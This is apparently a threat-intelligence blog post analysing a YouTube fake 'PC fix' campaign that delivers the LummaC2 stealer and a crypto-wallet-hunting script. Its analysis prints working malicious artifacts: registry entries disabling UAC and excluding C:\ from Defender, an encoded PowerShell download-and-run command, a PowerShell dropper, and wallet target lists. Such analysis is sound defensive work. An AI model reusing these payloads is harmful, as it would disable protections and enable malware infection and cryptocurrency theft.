Ongoing series: #1 #2 #3 #4 #5 #6
yet another youtube pc help update
After several domains related to the campaign from the article youtube pc help #2 were blocked by registrars and some YouTube videos were set to private, there was another pause in the campaign. However, a new series of videos was then uploaded with a new link to another hosted file with a new payload. Time for another analysis:
The Video(s)
One of the previous identified channels published multiple new videos, linking to the new campaign:
| YouTube Link | Upload | Link in Description | Channel |
|-----------------------------------|------------|---------------------------------|---------------|
| youtube[.]com/watch?v=69yzkjnRCs8 | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=NkCXb34TK5U | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=i3nIxACbLvg | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=nraJJ-uXmaQ | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=ncHgjnKlN7M | 2024-07-23 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=vZ_v1RRFlEY | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=sBZNlaA7no8 | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=9oeVLXCallE | 2024-07-24 | https://tinyurl[.]com/tweakfix | @Skoota18 |
| youtube[.]com/watch?v=7ge7ivXmbQw | 2024-07-24 | https://tinyurl[.]com/tweakfix | @Skoota18 |
| youtube[.]com/watch?v=MIYoCrTrUk8 | 2024-07-24 | https://tinyurl[.]com/tweakfix | @Skoota18 |
| youtube[.]com/watch?v=N3hmcKO_AFU | 2024-07-24 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=22T0XJqH3q4 | 2024-07-24 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=9UVK9R40KoQ | 2024-07-24 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=U3ozXujTm_c | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jaydizzle847 |
| youtube[.]com/watch?v=yTZS8h8pPoE | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jaydizzle847 |
| youtube[.]com/watch?v=dfJzR4evcBw | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jaydizzle847 |
| youtube[.]com/watch?v=v-QVon6RNAM | 2024-07-25 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=iAjtq4EZ2XY | 2024-07-25 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=R4f4Qz5gdCU | 2024-07-25 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=g1sZDBEj4ZI | 2024-07-25 | https://cli[.]re/3D4Mz3 | @Skoota18 |
| youtube[.]com/watch?v=tmJTNrgSmGQ | 2024-07-25 | https://cli[.]re/3D4Mz3 | @jaydizzle847 |
| youtube[.]com/watch?v=QugS0AYkCvs | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
| youtube[.]com/watch?v=C1A2aVk6Ufg | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
| youtube[.]com/watch?v=AzMQ5cjZ03I | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
| youtube[.]com/watch?v=9idZvNpXzhU | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
In this new iteration of videos, additional issues were targeted to reach a broader audience. Besides the known search terms 0x80070643 and KB5034441, new videos also allegedly address issues related to MSVCP140.dll, vcruntime140.dll, and error code 0xc00007b.
The Download Site(s)
Presumably to make detection and reporting more difficult, the delivery of the first stage was changed. The link from the shortener redirects the user to geeksupp[.]com. However, the IP and user-agent of the request are evaluated, and depending on the result, the response varies:
Option 1: The harmless and fake website of the supposed GeekSupp is loaded, which is clearly a generated site of a purported legitimate service provider.
Option 2: If the user employs “normal” user-agents and comes from a household IP range, they are directly redirected to a file hosted on a file storage and sharing service.
| File Sharing Link | File Created |
|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|
| https://www.mediafire[.]com/file/gagjlct7gmk4k3b/Tweaks.zip/file | 2024-07-22 |
| https://www.dropbox[.]com/scl/fi/dg21d2z1g0x8nqb2oyw6m/TweakS.zip?rlkey=i5wragdhhm3urod1mkqw07sxv&st=yjdwd53p&dl=1 | 2024-07-25 |
| https://www.dropbox[.]com/scl/fi/rw0znswxekdyoi3tm3yhm/tweak.reg?rlkey=oirtnf7k8vfnf3vxoxjb6vdw8&st=cv3svwr8&dl=1 | 2024-07-25 |
| https://pixeldrain[.]com/api/file/4VYReuMg?download= | 2024-07-29 |
| https://dropmefiles.com/JUSvP | 2024-07-29 |
| https://cdn.discordapp[.]com/attachments/1267531349279903867/1267531429827579964/tweak.reg?ex=66a92022&is=66a7cea2&hm=60deb5b149279c25816408c8efc340134b599cbca54a550903aef70b7f63051a&= | 2024-07-29 |
The Code (Stage 1)
The file available for download is a zip archive. It contains several files, including some legitimate DLLs and the tweak.reg (SHA256:8FD1045F156BE3A3D226C04D7E140D3AAF115A31ABBE36A9EB194A63521BA46C) mentioned in the video. This is, as before, a registry file bloated with junk, but now it sets 3 keys:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SchedulerMaster"="pOWerShElL -eP ByPASs -WiNdOwSTYlE HiDDen -CoMMAnd \"& {Add-MpPreference -ExclusionPath 'C:\\'; }\""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"ZASUSU"="pOwERSheLl -eNc LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwB0ADIAcgBsAC4AcAB3AGEAcgB0AGkAYwBsAGUAcwAuAHAAcgBvAC8AdwBlAGIAZABhAHYALwBqAHIAZQBnAC8AQwBPAE4AVAA="
The first key sets EnableLUA to 0 (or false), disabling Limited User Account, which is the old name for UAC (User Account Control). This effectively disables UAC, allowing the use of privileged rights without explicitly prompting the user.
The second entry sets a RunOnce entry to use a PowerShell cmdlet to add the entire content of C: as an exception in Defender, meaning no content stored on the (default) system drive will be scanned.
Lastly, a Base64 encoded command is added to RunOnce, initiating the download of the next stage and executing it using mshta (SHA256:C8647F3FDF48A33F8F8F7F47D2CC875996569DD49F94ED804C78CA8DB477C23C).
The Not-So-Executable (Stage 2)
As previously described in youtube pc help #2, the downloaded file is an executable, but the relevant part is encoded and hidden within it as a JavaScript script. Similar to before, several stages of deobfuscation and decoding are necessary to reach the actually interesting layer. For example, the JavaScript code is read character by character and shifted by 427 positions.
function vMP(dSV){
var eZn= "";
for (var Wjj = 0; Wjj < dSV.length; Wjj++) {
var Kry = String.fromCharCode(dSV[Wjj] - 427);
eZn = eZn + Kry
}
return eZn
};
After several more layers of obfuscation, the decrypted PowerShell script can be analyzed. It contains five functions, with the top-level call invoking CGl.
function CGl(){
$VVh = $env:AppData + '\';
Start-Sleep -Seconds 8;
$wFTlOkINiDNN = $VVh + 'giupload.zip';
if (Test-Path -Path $wFTlOkINiDNN){
XRu $wFTlOkINiDNN;
}
Else{
$naNPme = DCI (rVh @(5228,5240,5240,5236,5239,5182,5171,5171,5240,5174,5238,5232,5170,5236,5243,5221,5238,5240,5229,5223,5232,5225,5239,5170,5236,5238,5235,5171,5243,5225,5222,5224,5221,5242,5171,5230,5238,5225,5227,5171,5227,5229,5241,5236,5232,5235,5221,5224,5170,5246,5229,5236));
DwV $wFTlOkINiDNN $naNPme;
XRu $wFTlOkINiDNN
};
}
This function checks if a file named giupload.zip (SHA256:5AEED0DAA0D8EC420C31282257C7CB8286EB5A150D53B60C7698949923C557BE) is already present in AppData. If not, a further obfuscated call to DCI (downloader), utilizing the rVh decoding function, is executed instead. Then, the functions DwV and XRu are called with this path as a parameter.
function XRu($NCh){
$AumUS = $env:AppData;
Expand-Archive -Path $NCh -DestinationPath $AumUS;
Add-Type -Assembly System.IO.Compression.FileSystem;
$zipFile = [IO.Compression.ZipFile]::OpenRead($NCh);
$IFpY =($zipFile.Entries | Sort-Object Name | Select-Object -First 1).Name;
$Dffhq = Join-Path $AumUS $IFpY;
start $Dffhq ;
};
The XRu function is responsible for extracting the downloaded file to AppData and then executing the first entry contained within.
The Semi-Final Payload (Stage 3)
This executable file is giupload.exe (SHA256: 7C9C5DEE8DFCDC5BD57F366598E5F4CD08014FF38FD2A835C22B67065400AC47), originally named NFOPad.exe and delivered with an invalid certificate from German Gorodokuplya. It is a payload associated with the LummaC2 Stealer, which downloads and executes several additional files, executables, and C2 configuration files.
A Final-Final Payload (Stage 4)
One of these additional files is attacker, another PowerShell script. This script includes several sandbox and AV evasion functions, as well as a core task.
$TaRgeTFoLdeRs = @(
"Ledger Live",
"BitBox",
"@trezor",
"Roaming\Exodus",
"Local\Coinomi\Coinomi",
"Roaming\Atomic",
"Roaming\Guarda"
)
$CHrOmEExtEnSiOns = @(
"nkbihfbeogaeaoehlefnkodbefgpgknn",
"ibnejdfjmmkpcnlpebklmnkoeoihofec",
"egjidjbpglichdcondbcbdnbeeppgdph"
)
The main goal of this script is to read Chrome user profiles and search for specific folder structures or Chrome extensions related to crypto wallets. If indications of such a wallet are found, another executable AacAmbientLighting.exe (SHA256: 5BF36CC6314E62EDCAB7A0EFCBDE3E014540ED8C72B8F53F1B2DCA44AF7417B1) is downloaded and executed.